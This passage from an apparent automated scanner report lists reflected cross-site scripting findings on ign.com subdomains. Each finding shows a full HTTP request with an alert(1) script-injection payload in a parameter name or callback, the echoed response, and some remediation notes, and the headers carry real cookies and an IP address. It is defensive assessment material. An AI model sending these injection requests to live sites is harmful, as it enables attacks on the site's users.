Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:05 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 120600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/ob2/068/142/14235018.html?25be8"><script>alert(1)</script>f1c064d66f3=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.104. http://cheats.ign.com/sendcheats.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /sendcheats.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c92f"-alert(1)-"8c3aa49fd93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sendcheats.html?9c92f"-alert(1)-"8c3aa49fd93=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:55 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 78118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Send Cheats</title
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/sendcheats.html?9c92f"-alert(1)-"8c3aa49fd93=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.105. http://cheats.ign.com/sendcheats.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /sendcheats.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be516"><script>alert(1)</script>130f141382a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendcheats.html?be516"><script>alert(1)</script>130f141382a=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:53 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 78164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Send Cheats</title
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/sendcheats.html?be516"><script>alert(1)</script>130f141382a=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.106. http://club.ign.com/b/api/objects/user.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://club.ign.com
Path:   /b/api/objects/user.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3abb4<script>alert(1)</script>6da74b2156f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/api/objects/user.js?callback=?3abb4<script>alert(1)</script>6da74b2156f HTTP/1.1
Host: club.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:15 GMT
Content-Type: application/x-javascript
Set-Cookie: NSC_vtfsqbhft_iuuq_wjq=ffffffff0909737b45525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 94

?3abb4<script>alert(1)</script>6da74b2156f({"message":"objects not found for logged in user"})

1.107. http://comics.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b97e"-alert(1)-"d8da5fb0758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?9b97e"-alert(1)-"d8da5fb0758=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:42 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-14395-411846107-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:12:42 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041162862v-1n-12mc+1297041162862mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 144690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/?9b97e"-alert(1)-"d8da5fb0758=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.108. http://comics.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24e1c"><script>alert(1)</script>7a3764f3771 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?24e1c"><script>alert(1)</script>7a3764f3771=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:39 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-1276965940-9;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:12:39 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041159959v-1n-12mc+1297041159959mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 144777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/?24e1c"><script>alert(1)</script>7a3764f3771=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.109. http://comics.ign.com/articles/113/1136508p1.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /articles/113/1136508p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53c59"-alert(1)-"e80a33c5c90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/113/1136508p1.html?53c59"-alert(1)-"e80a33c5c90=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:38 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15002-1104835483-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:38 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041219032v-1n-12mc+1297041219032mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 109817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
oreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/articles/113/1136508p1.html?53c59"-alert(1)-"e80a33c5c90=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.110. http://comics.ign.com/articles/113/1136508p1.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /articles/113/1136508p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39411"><script>alert(1)</script>24e9a9f553c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/113/1136508p1.html?39411"><script>alert(1)</script>24e9a9f553c=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:33 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22329-1386714246-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:33 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041213610v-1n-12mc+1297041213610mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/articles/113/1136508p1.html?39411"><script>alert(1)</script>24e9a9f553c=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.111. http://comics.ign.com/index/characters.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/characters.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e150"><script>alert(1)</script>acaf8d67148 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/characters.html?6e150"><script>alert(1)</script>acaf8d67148=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:28 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-1388692171-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:28 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041208382v-1n-12mc+1297041208382mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 135696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/characters.html?6e150"><script>alert(1)</script>acaf8d67148=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.112. http://comics.ign.com/index/characters.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/characters.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c7f6"-alert(1)-"8e609d735dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/characters.html?3c7f6"-alert(1)-"8e609d735dc=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:31 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26779-760949571-9;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041211700v-1n-12mc+1297041211700mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 136251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/characters.html?3c7f6"-alert(1)-"8e609d735dc=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.113. http://comics.ign.com/index/comicseries.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/comicseries.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de00c"><script>alert(1)</script>3d074d6432d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/comicseries.html?de00c"><script>alert(1)</script>3d074d6432d=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:01 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-1908380328-11;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:01 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041181719v-1n-12mc+1297041181719mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 124278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/comicseries.html?de00c"><script>alert(1)</script>3d074d6432d=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.114. http://comics.ign.com/index/comicseries.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/comicseries.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e6dd"-alert(1)-"0e8b7d8f901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/comicseries.html?8e6dd"-alert(1)-"0e8b7d8f901=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:04 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22329-380005497-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:04 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041184031v-1n-12mc+1297041184031mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 6406

<!-- stitial !-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
'') {
docTitle = defaultContinueTo;
}
document.write(docTitle);
}

   function goBackToReferer(){
       document.location.href = "http://comics.ign.com/index/comicseries.html?8e6dd"-alert(1)-"0e8b7d8f901=1";
return true;
   
   }
   setTimeout('goBackToReferer()',18000);
</script>
...[SNIP]...

1.115. http://comics.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5591"-alert(1)-"85de685ec3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/features.html?a5591"-alert(1)-"85de685ec3c=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:31 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26779-1554243470-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041211663v-1n-12mc+1297041211663mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 133703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
